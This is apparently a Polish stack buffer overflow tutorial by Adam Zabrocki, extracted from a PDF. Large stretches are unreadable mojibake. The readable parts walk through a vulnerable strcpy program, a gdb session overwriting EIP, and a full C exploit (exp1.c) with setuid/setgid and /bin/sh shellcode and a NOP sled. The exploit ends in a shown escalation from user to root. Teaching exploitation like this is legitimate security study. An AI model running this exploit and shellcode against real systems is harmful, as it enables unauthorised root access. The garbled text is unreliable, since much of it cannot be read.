Bufer overflow
by Adam Zabrocki (pi3 -
pi3ki31ny@wp.pl
)
(
http://www.pi3.int.pl
)
:VW S
Bufer overflow
by Adam Zabrocki (pi3 -
pi3ki31ny@wp.pl
)
(
http://www.pi3.int.pl
)
:VW S
"!$#&%(')+*,-#"*"".//01*"1*
23-4
5
6718:9&;=<$>(?6$@BADCE"9GFHIH67HIJ7LK1M$I7L9
N
O"P1Q/R/P QTSVU/QBRBUWOXP Y[Z1WD\^]`_$abRBcWDde/fhgiQTjZak"YlP
m
n:opq&rtstuv(wJqyx1uiz[{B|$p}xpyx~|D-p/v}x u&|$wqTDrD`u: lLp|
nXxB}$pB{Dq
w}u$w$1u/pVs
`( V¡t¢£$£ ¤¦¥$§$¨V©¥ª[ £«¬¤
D¨®Di¨- ¯yi¤G £«¬
£«(¨V©/¯&¥°
±1²³´$µ¶¸·+¹D³DºµV»¼½(¾-¿DÀi¾®²Áy¼Â-ô$µÄB³´$µB¶Å
²ÆÁ¿Ç
ÈÉËÊ-É/ÌÍiÎVÏÑÐ$ÒiÓXÔÎ/ÕÍiÔ1ÎBÖ×ÒØÈÔÎ/ÒÙ-ÚÊ-ÒÛÈDÜDÝ
ÔÌBÞ
ß
Û
àáãâäåæèçéëêìäDàDí
îðïâñ-ìîåê-òôó$õóDæöâñVäDà$÷Bø¸ïDùú/ìDûáüóDñ-õ(ýiñ-âíyåþ®ÿ1à÷îBäDà$÷ø
òtêiþ®ÿ
ïDùBìÿ`ûñ+à
íõiê
"!#!#$%&'()*+%&#',', -(. /',0$214356087(!9!2:";<9=6$>?"@:A!#,BDCE@):! )
w biblioteczce ANSI funkc
BD=#F(:HG)I!$@J) K(8BLCK(M4N8ON8"C
P(QRTSUVW XYZ[]\LW ^UW_)P`aEbX(cYOd(eIU
c+W^#fZ [hg`X^Z)\LfiXWjbk8lmafn8V(o Ypf$XXYaf
strcpy(), strcat(), sprintf(), vsprintf(), gets(). Niestety
bezpieczne funkcje takie jak fgets(), oraz fgetc() czy getc() i getchar()
cHb kqaUP(lsrJSURKUVUR
Wt
rJo^UVYS_o YKX#f"buR2vAWw4Z8fxRyYazf"Z [K`k
{|}x~6#( }("~I(~##-$8 8/+y+H~#|u4~ {( -
#uH"}D?)#}"| }L,u~/+K}({#}$|#}$~}+6
# ¡+¢}$yD)Ou{({i#4£(¤¥#, 8u|}#")"}¦§I)
¨©xªy«¬®¯)°±¯² ¬³ ¬q´µ¶·u³¸
zcze
² ¹² º©°(² ¯¹+³¢»#²q¸¹³¯)¼8©"³¡½+¾#³8²¿°À³¯Á)¨$°ªKÂ)ÃÄ°(¯)² Åq°Æº¯H«(¹+³Ç¼²È"º©$³ ¬É»#©$³Æ² ªI»#°i²¹+² º©]ÆÅ©ªy»«¼¾¿¼8©¶8±(ʪ
Á,°¯¬² ¹AËD·D¶8¼ «#¼ ¾9½Á°(¯¬²u¹¦¸)¹+¯©x»#±¸JÂÍÌ(Φ³2°#¸¹+² ¹A»©$³¸J¶K°¹«#¨"³¸/#³¼u«Á©¼Å»³Ã©$ÏyŲ Å ªI«¼ Ų·ÄÐÈAÑÆ«¹³K¸Í¶I¯°¸)¹,¸Å³
ªÒ»#©$³¯)°Ð©³ »©xËE©¼ ¾»©xÏ#°¯,Å8³Æ(»#©³ÌÓ#² ¯H¹+³2¸4¶Ô°»³»²IÁË»º¼
jach z rodziny *printf() (syslog() tez).
Õ
»#©$»#©$³,· ¸/Å «¬Ö²¯H¹"«ºË#¨³Ô#°¸¹² ¯² ¬m¸D©$ѯ,Å «Ð#¨©$Ï «×¦·D²ºªI«º°(¯Å«¸)¹²8×y»#©$³Å ªy«º#¨³Ô°(˨$²¯,»³ÔÐÈ+Ñ8Æ«?¹"«Ë
buffer overflow (BO).
2. Teoria
ØÚÙ ÛÜÞÝß)àÝ8áâã$Ùä8åçæLè éêâàëì#è¡íÔÜé#àßÝÜî)ïHèäÇÛðAñ
òó¿ô"óõöê÷]øpùAôúûýü#þ8òþ¡ÿ(û
ú2ú ô+ú û¿ôóõö
buffer
overflow -
õ
õ
"ú
üö,ÿ)úúDõ
ô
üú
ò
ô
)ÿö!"
Dúû#
%$
ô&ÿ'ú(ÿKúó
õ)ÿ)
$
õú!*"þ+)%,.-/)ÿ)
%$0$
ûAú8òú
$
þ
1243+5617839:;<=2>1%?+;<A@B2C>?DFE@G2>?DH:I24?+5.@G2J.KL@G2>?DH:=M3N"OQP%;OSR>31
strefy stosu. Dwie pierwsze strefy praktycznie nie m
J.@1TVU:XWV19X39X?YU:8M>1?M>R783+Z1%OW[3\2435/]
^
1:N`_%?bac?@2d78OQP;eR7[:0243ac?Nf9OQ;1:f@B24RX@hg
i
24j_ka\?%@2lR9=U.mQR5.OQ?+NnMX3NoOQP;OL1378OQ?+>3pacT%;\:qZ39?]/rts>J9X;OQ?>1%?;1
y sam jest abstrakcyjnym typem
danych. Stos jest typu LIFO (Last In First Out).
^
<RZ1OY2JuR24RXKeOv_wRX@G2H32C9OxRU.OQ?52
52Hj>:yUXP+Z1OQ?
MRzR_%R9:*9X3@B24RX@cOQ?KUXP%Z1OQ?x1ZFahP
{C|k}\~.Q+ 8|/hG{{H{|"%~ QQ0 [{|"4(BG{
vBB{e{4{H|AQ*~~+{H|c}h8{|"% B| {¡X|. X%%¢ x.Q+ 8|
}h
£¤¥¦§¨0©£ªX©«¬Y¥"ª®X¨V¯e¤°ª®¤¯0¨±V°.«²(°¨eª³X¬´G¨+µ
¶\«C·¶h¬¸®¨°®¨¶hµ¹º»µ%«¬¶¼ª³.«C©¤¯#¨+®X¬[©½e¸¯0«¬¦¾c¬©£¿£4ª
ÀÁXÂÃGÄÅpÆcÄÈÇdÉÊËÌÀÃGÄÍÈÇÎeÇSÏÐÇdÉ¢ÊËÒÑÀÑÄÆ\Â*ÆcÂ%ÑÂÓÔÂÕCÂÖ*ÂÓ×8ÓXÄÈØ0ÙÂÃÍÅ+ÚXÀÛÂÜÞÝB×4ÀÝBß.àVÓÄ\×4ÀÖoÙQÄ%ÝB×8ÇÎeÇà
ÀÑØ#ÃÀ×CÓ.ÙQÂ*Ó.Ù(á"Ç/ÉÊË0àLÍÑÂpÆÖßhÆcÂVÆ\Â+ÑÂÓAÂ%ÕÂÖfÂ+Ó×HàSÄ"Å%À6ÍÄ¢×CâÖãÙÑÍ%ÙCÂfÃÂ+ÑßÜßcÆcÂoÀ=×HÂÓAÂÕQÂ+Ö*ÂÓ×ÃGÀÍ+Ö"ÙQÄ+Ã
stosu. Rysunek 1 opisuje operacje PUSH, a rysunek 2 opisuje operacje POP.
äÐå.æçèXéêLë%ìíîêïðçhñcéeîòXéóGï+ôpñcõVídö÷ø¢ì
ùÐú.ûüýþÿ
ÿücþ
þ
!#"%$'&(*)&+-,./(102$43)"%!/(1576
-
.83:9<;=&>$?0@7+A5B!?0C;C"D56@27E?)/FG5$'&(1)&+H?3:)827@IJ(K5$-&(1)&+MLN0B@O0J;P&@5
&(10FDQ407R/6S5&TU0
A5V8)W6S)@LX"Y06[Z86@Q8@!?0;B07!/QXR?\Y0=0Z#\]"%$072^AJ"A5&S(RQ8!?0LN"D2@!#"]5CR)Z?0&>);_Q8;C0!/QNZ86@5@[AJI7R6)
&Q#&S(K5LW+`,1Z6@57@a27)b.83b@LN"]5!#"Y0c&;B)dAIe;C06(1)?fhg9hH_3U6S)275&>)/6'+8iQ8;B0kjK+8!8$2^AJ"P3UlW./mn)/6S0@o3qp3qT=r8Q
+@+8Z5F]!#"Y0g_&(*)?&H
.(*)&s;b@0\]5i7!)?f2O")8R'"tLWZ\]5Lu57!/(*072SA"vLu)/i5P6S)?&>!?Igw;xR8yF*Tz\t+r4;xV8y6S{N,K2
|?}8~/vD}-7~ O:#}8/
}/?N8?u8O>%8%ux]7?}?h[}~OG7Y]h]u*}?hh?7?|8 81~8|¡1}?
7~Y }7¢~£1¤¥?}/YCB17 ¦q§wY ¥O}?
¨O©Uª8«S¬¨7®>¬«¯O°`±1²ª:³´K²?µK¶]·#¸¹¬µ1¬«¬¶]º·q»/¼U½¾s¿o¨À7Á
¸´K¼z»Âh³»8¼«¯O°_²#©]ÃWÀOº¶YÃÁ¬8Ä©%ÅPª#¶]ÅN7²/µ1º¨Æ©*³
¸Ç¬/ÃN¬²-°P®ÈºÀÁ8°CºÉNº¶tʬ²?ºN¬®µ1ºµG²#©¶Y7Åu²/µË®µ*¬?®>Ì·
ÊÍ7ÄÎϲ?ºs²º®µ1Ъ²/Á=°=¬¶%²/Á=ª?¬u®SµK¬?®h©D/³¸ÑÁwª8«^ÀÁÆÅN©Y7ÅPÁ·©tÃs°P®È?º7ÀÌÆϬ/²=²?º_¬?®µ1ºJµ1²©O¶YÅM²/µU²º_®µ*¬?®©Y8³
ÒÓȺÃÄÁ8ÅÔª8«¬8ÕO«Sº7ÅM©Y©G®µD²©DÆ4°w©YO¶YÖ*̲8ȨƩ³v¼:¬Ä8¨7Àº®WÌ8«Ì¨×?ºÅN©Dº²#©YºBƺȩY^ÆØWÖKÌ8²8ȨƩ]·<²º®SµK¬?®N®dÍ
ÈÙGºÄ/À©Y¬/²?WµKºÈÀ°=º
²u«SºÅWÈ#©]·ºuª?¬4ÀºÈ?¬
Ú?ÛÜOÝÞ#ßtàáß]ÛâãÜßDäåGäÞß]äWæäçuèß[é>ê
ëì8í^îdïNðOñ=òóí/ô¥õ<òJñwöYí÷òîøNðó?í
ù
ò÷Sò7ïuíúG÷KûWüKý8óþ?ÿîöîí^îYð/þ?òtó?íëïMö]íóó?í?ö¥ì8òóísó#öYíë7ì/ó?í_ì8ð=ðìOúDñCð÷Sëíó#öYò
ù
ð
ù
÷^ëí7ì/óöYíSî[÷Sò7ïWþöú*ðý:ô
oöYí]íþðï
ù
öDòJú1ð/÷Oñ
ý
"!$#&%(')!$#*,+-/.10234056784:9;<20>=/?@9BACAD/EGF03H
alnych jak i
I
B?JBKL3
I
0A-96B4/MN96DBEO02CFP5Q0R8S0C2T!$#UAV96W VF6PX=/?Y96BAV9
I
0C2D/=Z<H-03AA-96S9[AV H-D9
#]\>^_`9a#]b#dc3!#ef]AV9DB=/?g9hAA?iD0"ja#k+C-FlMlA
I
,0D3m0DE"nAQF6AB=/4:9;opBA>fq!#qc
j]#@=rH0F6s9Bt3a",H-/u/AV9hH-9B?vB?1H-9%(j/?Jr#w0A(/
– wskazuj
lA-o,/?"H-;o`,(0-x9/*:c
#w9/p",=ey=D/=zt/H{0.-9}|Q CAH-Dyf~f,}(0JH-021=B7BA
I
0F0PC96B?&c#}0CF6P03AGA-C?@+9hM
I
=sm 4/A
f,~^#&0=K03y=03A1A-0e1j]#%(!$#]*+-.Y,40=BV8r?@9yxD2CF6<A-07$/?1H-9w%(/?"H-<A07r|( CAH-Dy9[*:c
"
I
9/pH-0
I
904/A-&t,G7Bpp0R8/H F[AsP
0^C#i20j]#g%(!$#w*+7.40=B8 A03j#g%Q!$#w*+>
A-(;
I
A-96
I
=m 7BAY7^#)c)#a=/XetBRmDs96 S=|p AH-D9,Q01?J a:9=s0-,Qs8eD/=/V=DB=03AV+pBHV9H0C2
zwany jest epilogiem funkcji.
d0.DB=/?17A-
I
y=BH5Q2=9kBH123=9B5(
I
0F0P7%
I
=H5Ks2792s8lA-<F9Q9hA-P3 f*
Listing 1. prolog.c
void funkcja(in a1, int a2, int a3) {
char buf1[5];
char buf2[10];
}
int main() {
funkcja(1,2,3);
}
^CH03?
I
9F[ tfB?14(B=r(BA
I
0CPB?v=<0
I
Df{
-
^>.> 40=B8rH0C2e3xxB?J.-FB=
# cc -S -o prolog.s prolog.c
# cat prolog.s
VR,796BpF9t96;A/?
02
I
0379623AV9hH
fm?1.-F6/0e]c0M/A
AV9h?
H-9KFhH7BM/AD/E
=DB=
=s03.amp034s8cC#w0
I
96p7m=s4492=9h?1G
I
sDBV|y96D/=A{<5KRmDs9[0-Rm8<eV,Q;
I
ff{sD{
I
02CDB=s3DE0C23=s/A-9
2C0T|p AH-Dy9Qcbr(L3MXB,P ?G/A|Q AH-Dy9<:{
I
035K0M03A-&023<03KA-ZH0CF:A-0R:Ds9pczb,QBAV9r/P ?GAd,
HC5Ks2=960A$fBH0
I
96/p"=BV+
rAexB?vH0A-96sDf,a<035QBAV96<|p AH-D9
pushl $3
pushl $2
pushl $1
call funkcja
92=9h?1 -+e9hMWA,(0&x{H5(23=39603A-0203AH0CFxA0R:Ds9eB,P ?G/A]cb,(BKA-9eBP3 ?G/A~,
I
035K0M03A$tH0
I
96p7m=B]c/"lH-03A-9Df,ae05(BAV96
A-m=s$|Q CAHDf9
I
0
I
=s/=<DFF+HQL3
I
035Q03MB7A-e(0
",-/ /¡V¢h¢6¡V£(¤¥-¦§¢¨Q©pª
- Instruction Pointer). Jest on potrzebny do tego, by procesor podczas, gdy
m«¬¦B/®G®-«3¡®4s¯§t/°3±o²(¥¡C¦§t³s´7¢6³sµ33¢6B¶q·µ¢³e¸@>t¢6¹
º»¼½C¾s¿6À
”
¿]¾sÁ"ÂGÃ<Ä-ÃÅ,ÆQÇBÈCÄ-¿6É<»<ÊËÁÄÊ»7ÃÀ
Ì
Í
Ã/Ë-ÎÏÁÈÉ/¼Ã¾
Í
ÉÐ:Ñ4ÒlÇÓ3Ô¿6É/Â"ÊÕÁÄ-ÃBÔBÊ»7ÃÀÏÖ$×)Ø~ÙJ¾/ÔBÊVÚ¿@ÃÓ3¼ÉÅ:É/ÂÛÈÁ»¼Á3ÆÄÊÂÑÜdÁÝþÔ/Â"ÊÆQÉ/¼ÃBÔ
Í
Ã/Ë
»eÊÕÚ6ÎsÓÃrȼÁÚÁÕÞ
pushl %ebp
movl %esp,%ebp
subl $20,%esp
ß
¿ÓÔ¿hÂ1ÊÆà-Ùe¿háWÄÃÅ,Æ(ÁÅ
Í
ÉÅ,Æ4ËâKÃÓ3Ô¿Á3ÄÊ»>ÅË-ÃBãÄV¿h˼ÃÂ"ËV¿r×dÒ$ä
Ì
Ô/»4Ã/ÄÊÆ(ÉBáWÒä`ÚhàÝåaäwÐÙoÄ-ÃÅÆ(ÇBÈCÄ-¿É
aktualny adres SP jest kopiowany do EBP (nazwiemy go SFP), a sam SP jest przesuwany o rozmiar
Ô/ÂY¿6É/ÄÄʾ/æÚÁ3ËÃÚhÄÊ-¾/æ»èçQàCÄË-¾
Í
¿QÑ
ß
Ã/á/ÄÃ
Í
ÉÅ,Æ¿6Ä-çyÁ3¼ÂGþ
Í
Ã&ÁÆÊÂ@Ùz¿háÈÃÂ@¿6ÇsÀZÂGÁ3ásÉZÝÊÀÃsÓ¼ÉÅxÁ»4Ã/Ä-Ã
ÆÊVÚ[ËÁG»4¿ÉsÚ6Á˼Á3ÆKÄÁ-é
êë6ìBíYëqîmïKðñ7ìsòóôQõ3ö,÷ñøìîmùBúíüûCöùBúû-ìý3óCþ@ñeúøð-îxëkÿìmôú[þ-ëhô
y -
ùsì6÷/ú@ô(ð
ðCýWûöðê÷î:ðöì)ì/óSñ7ësêñQþøCóêfëîý3ñ4ìCþyð3öpú
-
! "$#&%('*),+-"$.&/'0 1324 6587:9<;=#&%>?)A@B0C'DFEA%
/0?5G@0C'%HEI9J"K#L
M?NOGPQR3S6Q4TVUXWP!Q<Y$Z&[\N^]`_VWP!Q<Y$a&[(bcd-Y$Z&ebV[feO?TGMOCb[HNIgJYKah<M?NOGPQR3S6Q`Ti]6jHWP!Q<YKZ&[3klmPBd>[HNn?M
SP jest przesuwany o 20 bajtów (subl $20,%esp). Stos
oPgpOq[Xbr-sItBuPXYKTePCO>R3oNTQv[HNnBM?TQwYKPCdxQ`PCdyoP
rysunku 3.
z
b*g<S-oTd{|kG}~a&dPCOS4Q6TQ4PdV[(brstGuP(gpY$agk
eZW-S6Q4TCR3bYKTCeJPCO[(bda&oPB Y$T?a&eJT`YFbMBOoTRiPB=T
e!OGT
TCFo*NTBoNT W-S*aeP oP
earePRNFTNMCYNR]GkMGcd-YKZeb
widzimy na listingu 2.
Listing 2. victim1.c
int main(int argc, char *argv[]) {
char bufor[100];
if (argv[1]==0) {
printf("Ussage %s <argument>\n",argv[0]);
exit(-1);
}
strcpy(bufor,argv[1]);
return 0;
}
lTo
eagYIb
earePCR
eOCb6QR3S4Q6TPer&S-RyTCoY,Nrada
NS4Q6THuaiW-S*aeS
e!O?TCOiKS-odM!Q6nGcd-Y$Z&ePVoNTig
eP`[Vu&OP
uFSrah
M?NxMGNItBrS
au-PBoTQusFPo*NTQXQ6PBdaPerSRyToYqgJYIeJM
b*KkPGa[Va-MGa[VPBYKaRa>
eOGT
TFoNITCo*NTCR
WSaeScmru&b
a-uPRbHQ6PdaPer&SRiToYMNtBr
eO?Td-ePGMCO?P!Q6t?M`bNFsIahp3RNT!QCgMGP[WSaeO?TNRya&T3oPBu
N$g<P?
PGu&eT&g
a[qea&YIob
KSo-dMQ4Nk\}eJa-MBTgaeda&MCO?tGM[(b-da&oPCoNITKS-odM!Q4NWnGu&ONFTRNP PGu&eTgc
który
eP`[Vu-a
a-ua&WoNT(oNFTmQ4T?gpY
eOGTOBoPGMCOa&obyusP(o*NTGr-a3N¡MBP$PxYKPXa
TeP?MQ6PVg<daMCObgNn(W-=n?u-TRgTGr&RiToYKPGMQ`N
TBrRyTBoY$PCYNao3PBSs¢Y$k?u-TW-SrS6QRb>YKTePOxoPgpO
eJarePCR£Wbig6Nn¤Y$TCRiS
eOb6QeOGT?
– listing 3.
¥¦$§¨¦©ªV«|¬G>®C¯°ª±&²>³©¦I®w´-µ±ª&µ³¶°·¤´-µ·B¸-¹-º$³B»&°¼¬
root@localhost:~# gdb victim1
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(gdb) r `perl -e 'print "A"x108'` // komenda “r” oznacza “run”
½B¾C¿ÀFÁÂýBÄÅÆyÁFǤÈ-ÃJÅ-ÉÃÊÆËʤÈÅ>Ì*ÁÍÎ
//
Ï6ÁÐxÈÅ-ÑÊÎ`ÍwÌÅÃÆÊGÀÌ*ÁFÍwÈÊÃJÊCÆyÍCÒIÿiÓÊCÃJÉÂ-ÆyÍÌ-ÒF¿ÔÕ
Starting program:
/root/victim1 `perl -e 'print "A"x108'`
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg eip // info pokazoje informacje o czym chcemy reg to skrut od
// registers – czyli rejestry a eip to nazwa interesujacego nas
// rejestru...
eip 0x41414141 0x41414141
(gdb) quit // wychodzimy z programu...
Ö
ÊGÀÍB×GØHÏ6ÁÐXÒIÂÅÑiÃʾÂyÆÊCÙ=ÍXÚX¿6Î4Ê?Û
Ü*ÝÞBÜÝß-àá(â&ãåä4Þ?æpçâÞãèéÞêÞCëíìîßêçIïiÜß>ðIÝFñBÞBÜñä`ݼávò>ó3àôvÝõGé
`perl -e
'print "A"x108'`
ö
ïéÞÜÞCê!è6ä`Þ÷CøùiðIÝç$ÞêÞúû3à|üýÝFþGñHâÞãèéè4ä6ÞCë3ïÜß?æ<ÿ
ö
êß?ð=Ý
ö
ïî-êìéêßë¼âßä`ÞCëïëiè
!"#$%&')(*,+!-./&1023&!4576&(89%7&:8;4
<=&->28@?4%A.B4C4D!EF
GIH
4C4DJ<LKM4N';OQP4RS.TD?0U055N4!V<W'VKMXI4Y'0.T0FX%7&S()%7.Z057I:2()X%7&[Y(*2+
wynosi on 0x41414141
P5\].I(V.I@C:$%7&.^<?FD(2_N;`D4
A wynosi 65, a co za tym idzie w systemie
szesnastkowym wynosi ona 0x41
P2aZ4&Z^2+b
(5%2EX.^<?c^.T$./5 !%d.Q<?be&< 48f5(!%.#0bI;2(gP
RS./&e< !X02%24(^45L2h>(8gD4%782[i+9&08V[8f>2KE7#j54%0D./48
Hkml
^jnpoqapP7r")(
Y<?4X5:5N<?$4%)02ICd*07VFX+e7+)(C&d<V4s$%7I.t0e:2(C5X%e5N[V<X[(gP2u$N:
!v7+$5W&@!)02E&
(^^%&<wux5SD5*V+!$L+!S(=.I:$M&(5sX>2&$>'M2(U<FypK@2M
G
MF&!?y/M
.IqJ=%$78D<C%z058Dc.I{
- /bin/sh
O,>(=024|05v7}4EU(2758~@0702E&!&S&d<?L4%7I./
0e:402& D.T&42>2&>V'5M5mP\
04(5!x2%(WI+N'b(02I
a
ustawiony atrybunat SUID
*bD%7((e8D2%X78D:% 0e8;7VY%5.I@V<)(27J.T{!NN:VeD
&!4&(5&Eb5{5%7&q%7(-F@^^)(dbI+N:'9(=027C*{5sXVY&!X./&!
G
20gP5C7+S(d9(8DCs
.^<?&XyT2%Y:.Te{2T27;OQPU>24&>'M2()&4($Y(z./{5!N;N<4%24=PRY:9>?4%?0:.B8
^4z.;e7E&(5sX.T$vB
./{5NN!2%2*Z>5C7+4z1:(20V:.Q!sz%2%&N'(J;(228EPhr(>?4%7&S(+(X4sd5z&1.D45%%(
./{5NN!2%22PC\./&(V.T:>(28D7>(>%&05.TD!*z2%7(2>(iV@5*C+%({5!S(&V<snpoqa*C>2(
S.I&(2$8j5.T&e./{5!N:N4%2*7Je)V.^')(X&5sU%228@4%72(#^!X4%
.PRS<L+507S(VNsb.B?5$g
!%>MQ^Z!&Ive<4+=ZLDY^7.#&Y< &V<PI.I;V<M='j.DM2M^)RY
l
*~2Dv7<dC>@P\
02:(5!q.Th5b2+(2$5b>(C705v}4V<sb024.,&565&V<b02)fPr(pFMt2+(^)(Y>2(S&!0D./sF
przed naszym shellcodem bardz
%7+!&(*ZD%("%(&d<<Y(ntoZaY.T54&^ !d51[j.DM2M^?
RS
l
De>5?%7&<.^<?95p(27(2$!s9%27D %
G
'j.I:E25^tRX
l
O*%205v7V2X./5+p502& F@$./&!!2
./{5NN!2%7fP
l
M&(Q)^F 4@&!.Q!%(Y./&U>2VKM70M&!45&!2(#^45X7Lm)V.^<8:>($(52N !%4s9eDh
[ instrukcje NOP ] [ nasz shellcode ] [ zmieniony RET ]
l
M&(2>VN[+!(1npoqa!%7.bL+5d7>N:<&(5s)0502M&&2%B^?!<%z0524&! ;2.I@5.T
G
Jv7J($^eB2+L0;.Q8;
.I&!X./&!.TD8:(O:N5y/sM./4&EQ$ 02M&&./&.I{N:N<!%2*d&@X2(02-P
l
2& DC.I@5.TYC9!%7.
0xc0000000
P7\302M&(>N<+!V[$Db70I!M(52N< %2pJh
ret=0xc0000000-strlen(shellcode)-strlen(program)-4;
F T¡¢ /£!¤4£!=¢!¥7¦5§¨C¡@©2¥2§ªe«2¡D¬7§®¯D§F¡:°X±<§¦§¨³²V±; /§4¦±´²Vµ<©±`¡J¬°L¶·g©µ:4¸§©7¦§¦5§ I¡°X©7E£!¦V±[®¹
²©7¨C©2¤4¦±<¤£4¸2©»º®¼M©M®ª~°|«¡J¬7J½¨º¾4¥¿C®2¨± T£¤£©¦5C¡½µ'«©±'¦j I¡:E®2«5¤¢^
NOP, oraz shellcode, a jako
§¸®2¨¦¡¥©°e§Àµ:±`°X4¸©Á²2©¸§¨)®Â²5©2¥§¨S½Á¡½Vµ[«5©Áº2®V¼M©7Tª"«2¡D¬7M½Â£!§°$±§§¥7I i¥©Ã¦§ /£!!¸2©
²©7¨C©2¤4¦±<¤£4¸2©º®¼M©M®g¶zÄb¥5µ<4¸¯;©5ÅQ¤!±»¨C±<¾!¥7£4½Æ2·§¼J®2¦2«¤M¢F§¨±-¦§£½2°e§4¨Y½_©5¼E¼I Q¡@§¨±J¶LÇc©°e¯;§7Ŧ±:
©¥2¸§!¥7¦±:¾4¤±©5¼E¼ Q¡;® I²§°X±§¥®2À½»²©7ºVµ<4¨=¶mÈ~´5²µ<©5±`¡,º5¾!¥7£±:S°9½
¸2µ¿!¥§¯Z°X±¾!¤S¡D§«X¢^§4«1²2©¸§¨É´5²~ʶ
¤
(listing 4).
Listing 4. exp1.c
ËÌÍ2ÎÏ;Ð4Ñ4Ò!ÓÔ)ÕXÖV×'ÖØ;×<ÎÙDÚÑÒ4Û×hÌË
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#define PATH "./victim1" /
ËgÜ5ÓFÙ;Ý)Í2ÎeÞßÓàØ×'Þ$Ú!áÎ$ÜßÎ2áßIÓÔ)â
#define BUFS 110 // buffor podany jako argument
#define SHELL 512 // pomocniczy buffor
#define NOP 0x90 // instrukcja NOP
/* nasz shellcode z 2 dodatkowymi funkcjami */
unsigned char shellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0);
"\x31\xc0\x50\x50\xb0\xb5\xcd\x80" // setgid(0);
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
ËÌeã@âä2Û5ÑEå^ÓUÛÙDæßÓ9ÎÖØ×:ÑÒ!ÓUÜ2ßMÒ4Õ2ÖØ×[àÎ7ä2ÕSÓ4ÍßÚçcÜ5Î7ÞbßÎ7Ù;äÕdÌË
long ret_ad(char *a1, char *a2) {
return (0xc0000000-strlen(a1)-strlen(a2)-4);
}
ËÌeã@âä2Û5ÑEå^ÓUÛÙDæßÓb×'äVãMÎßMÔLâ^å^Ú~å^ÓÛYâ2àÕÞ$Ó!èäÓç/Ò!Ú4áÎSÚFé5ÜØÎ5×`ÙDÓYÌË
int ussage(char *arg) {
printf("\n\t...::: -=[ exploit na program vuln1 ]=- :::...\n");
printf("\n\tUssage:\n\t[+] %s [options]\n
-? <this help screen>
-o <offset>
-p PATH\n\n",arg);
exit(-1);
}
ËÌáÏ;æ7ÞäÓbã@âä2ÛÑMå^Ó
-
Ü5ÎÑÒ!ÐÙ@ÚÛdÌË
int main(int argc, char *argv[]) {
/* lokalne zmienne pomocnicze */
long ret,*ret_addr;
char *buf,*buf_addr,*buf_addr2,*path=PATH,*sh;
int i,opt,offset=0;
FILE *fp;
while((opt = getopt(argc,argv,"p:o:?")) != -1) {
switch(opt) {
case 'o':
offset=atoi(opta
êIë7ìQíî:îgï5ðEðIñQòómô5ïõ2ö÷2øYô2êEù!òùUúûøó;ü5ïýe÷þ[ü5ö
break;
case 'p':
path=optarg; // path do vuln1 programu
break;
case '?':
ÿ
Yÿ "!#$%
break;
default:
ussage(argv[0])
&'"Yÿ !#(%
break;
}
}
/* Sprawdzamy czy program istnieje */
if ( (fp=fopen(path,"r"))==NULL) {
printf("\n*\tI can\'t open path to victim! - %s\t*\n\n",path);
ussage(argv[0]);
}
/* alokujemy miejsce na nasz bufor podany jako argument */
if (!(buf=(char*)malloc(BUFS))) {
printf("\nI can\'t locate memory! - buf\n");
exit(-1);
}
/* alokujemy miejsce na nasz bufor pomocniczy */
if (!(sh=(char*)malloc(SHELL))) {
printf("\nI can\'t locate memory! - shell\n");
exit(-1);
}
printf("\n\t...::: -=[ exploit na program vuln1 ]=- :::...\n");
printf("\n\t[+] Bulding buffors!\n");
)+*",-.)+*,0/21354+678*99;:<=3*>@?81,A7=BCEDD?=)F"G=H89&I;J<LKGM13)+*6N?5<O$)+<L,KG
ret_addr=(long*)ret+offset; // dodajemy offset - dodajemy a nie odejmujemy
D&D2H8<POEK816QFG=RS?)FG?513LTUV4
W'1"TXI=OEO(I;YTZ6QF<8[Q:I;B
D&D\6Q,A<56N)+<5[QK8I
*]O^3=_L`
printf("\t[+] Using adres 0x%x\n",ret_addr);
/* przygotowanie do zapisu adresu powrotnego */
buf_addr=buf;
buf_addr2=buf_addr;
/* zapisujemy do buforu podanego jako argument adres powrotny */
while(buf_addr2-buf <= BUFS-5) {
(*(unsigned long*)buf_addr2)=ret_addr;
ab8cdeffLg+hikjkl2mnnop(q&rsZtuoe"vMwMxyzlza8e|{}&w(}Ae"a8~q;xa5yP}&wZ~&oe{vVb'{{'f5y
nnktuyLpzy(xow8~qpE8etQo"wvS g|o"w 5efLsbM
}
ny8t}e}Zq=o8esMf=yzabZcygb{tQ} 5y}Ago"awVeawpzq&fLoqfLoq&yLt
q;rs5y5xown
buf_addr2[BUFS-4]='\0';
n]oe" ZqtQb'{"vMwMxe"&w(ab8c|yLg 8yLvyx8q;x"owVqt}gbs8x|{'evq5 5yvy=xZq;xowvqn
for(i=0;i<(SHELL);i++)
sh[i]=NOP;
nya8~&qxoevMw 5y=xo}sVefg+tubzpEa=b8c|yLgo 5yvy=xZq;x"o"wvfLoqveaw5
zapisywany shellcode */
buf_addr = sh + ((SHELL)-strlen(shellcode)-1);
n+oe 8qAtb'{'"vwtQ5~&~;xyf=5efL ZqtQb'{
¡M¢]£k¤
¥¦§
for(i=0;i<strlen(shellcode);i++)
*(buf_addr++) = shellcode[i];
§¦¨8©ª«ª¬Z=®¬8«¯z°^±²Z³¨L´|®µ]¶8¨L·¨ ¬Z& "®¥·¸±¥(±¥=¹¨$°;«º=¨L·¨»º®&µP©¼;½¯5¨¾5
zy */
sh[SHELL] = '\0';
printf("\nExecuting the vuln program - %s\n\n",path);
/* uruchamiamy nasz program, a jako argument podajemy nasz bufor */
execl(path,path,buf,0);
return 0;
}
Skompilujemy teraz nasz epxloit i zobaczymy czy
®«ºL®;«¹«¿8ÀzÁµz¬5«|¼¶Z;µ´°Ãº=«·X¥Ä©²Z&º=«º=Á&«(¬8«©u®µ»¨
°$´+«ÅÁÆ°(µ»¨z¶´¨=»´+«"·M²kÇ
# chmod +x victim1
$ cc exp1.c -o exp1
$ whoami
user
$ ./exp1
...
# whoami
root
#
